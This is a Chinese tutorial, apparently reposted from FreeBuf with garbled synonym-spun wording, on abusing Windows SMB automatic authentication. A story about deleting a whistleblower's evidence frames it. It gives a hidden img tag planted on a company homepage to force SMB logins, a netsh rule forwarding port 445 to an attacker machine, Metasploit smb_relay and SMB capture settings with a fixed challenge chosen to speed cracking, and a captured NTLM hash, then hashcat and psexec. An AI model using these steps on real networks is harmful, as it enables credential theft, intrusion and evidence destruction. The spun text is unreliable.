内网穿透Windows（SMB）自认证的行使

SMB别名收集文件共享文件，顾名思义其感化是用于用户与办事端之间的文件交互。默认端口为139，445。SMB的认证过程在这里就不反复描述了，具体能够看我上一篇写的文章，路由器抓包剖析之SMB篇。在认证的时候细心的同窗必然会发如今Windows下接见SMB办事器会默认使用当前用户hash去向SMB办事器提议认证。下面的实验便与这个机制有关。 [本文来自：www.ii77.com]

实验情况：

windows 7 (smb server)               192.168.0.100

[原文来自：www.ii77.com]

window7(bob治理的网站)              192.168.0.2

kali(冲击机/路人甲)                         192.168.0.122（因为懒直接用统一网段IP了，人人能够假装这台是外网机械）

实验模拟：Bob是公司网站治理员，一天同部门的Alice发现Bob跟Boss妻子有一腿，决意向BOSS举报。并把证据上传到了SMB办事器，Bob知道后急遽到SMB办事器上查察，究竟发现本身没有权限接见，于是急遽向好哥们路人甲救助。路人甲知道情形后一阵思虑，决意用SMB中继来窃取凭证上岸SMB办事器，简洁画一下道理图。

正常认证

如图1为正常认证过程。

中继认证

如图2所示为以bob的网站办事器作为冲击机，然则办事器上存在杀毒软件，所以失败。

穿透内网中继认证

如图3所示为以Bob的办事器为代理，把办事器的445端口转发到外网VPS，再以VPS为冲击机进行中继冲击。

首先在公司主页上插入一段JS<img src=//192.168.0.2 hidden="看不见我">。因为Bob是网站治理员所以插入代码并不难，192.168.0.2是Bob治理的网站办事器，在Bob的公司每小我上班都需到官网打卡签到，前面也说到了SMB主动认证的机制，所以只要员工用IE（chrome和firefox亲测无效）接见公司官网就会进行主动认证。

原本想在网站办事器上直接装msf完成冲击的，然则Bob公司买了某60牌的杀毒软件。一装就会触发警报，所以路人甲决意把端口转发出来。

因为445是默认端口，要转发出来首先要停用办事。

Bob's web server设置：

打开..表，在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NetBT\Parameters中添加SMBDeviceEnabled并设置值为0：

更改..表

接着打开办事，找到server项，住手server办事，并在属性更改启动类型为禁用。

办事

重启后就会发现445端口被封闭了。接着就能够把445端口转发至外网。

治理员运行：

netsh interface portproxyadd v4tov4  listenport=445connectaddress=192.168.0.122 connectport=8080

端口转发

外网VPS/冲击机上设置:

启动msf

use exploit/windows/smb/smb_relay set smbhost 192.168.0.100 set srvport 8080

这里少了一步内网转发，能够用ants,ew,lcx,web代理等等等把内网代理转发到外网。

设置msf

接着运行守候，果不其然，在第二天早上所有员工打卡之后，终于抓到了有权限上岸SMB办事器的hash并进行中继，拿到了smb办事器的权限，成功删除了证据。

成功拿到SMB办事器权

实验模拟2：

上面说到Alice发现Bob与BOSS妻子有一腿，然后Alice把证据上传到了SMB办事器预备举报，在Bob的好哥们路人甲的匡助下删除了证据。然则Bob依旧担心Alice的PC机内会存有证据的备份，Bob只能持续救助本身的好哥们路人甲。

路人甲经由Bob知道了Alice在内网的IP为192.168.0.3。首先路人甲用smb_touch扫描192.168.0.3的445端口，发现Alice的PC竟然用的是XP，都2019了竟然还有人用XP。既然能接见445照样XP系统直接使用永恒之蓝对其进行冲击，发现冲击失败。背后经由Bob得知全公司的内网PC都安装了某60的杀毒软件。

未定名

某60为XP保驾护航，既然安装了某60的杀毒软件，很多冲击都无法进行，只能另想法子，于是路人甲便想到了把本身的冲击机伪 装SMB办事器，让其他用户向其认证进行抓取hash。道理图2所示：

道理图

Bob web server 设置：

1.在Web首页上加上js代码

2.封闭445端口，将445端口转发到192.168.0.122的8080端口。（因为装了某60杀毒软件，需要转发端口到外网，具体把持见上一篇文章）。

路人甲VPS：

启动msf并设置：

use auxiliary/server/capture/smb set srvport 8080 exploit

msf设置

如图11所示这里我们能够看到设置中有challenge这一项，这里之所以把challenge设为1122334455667788是因为已经有人经由这个挑战值生成了彩虹表，如许能够削减跑hash所破费的时间。

设置完之后只需静静守候Alice来日打卡上班就能够抓到她的hash了。

成功抓取hash值

经由组合hash获得Net-ntlmv1：

Administrator::FUCK1:6822b126aac81581dbcc3576a52dc4612f85252cc731bb25:a77b6fbd0247c656be59e409ae3a01c07ca6bbc11dec9322:1122334455667788

接着把hash扔进hashcat跑出明文暗码，行使psexec经由445端口对Alice机子进行号令执行，然后全盘搜刮，成功删除了证据文件。

*本文作者：꧁，转载请注明来自FreeBuf.COM

推荐阅读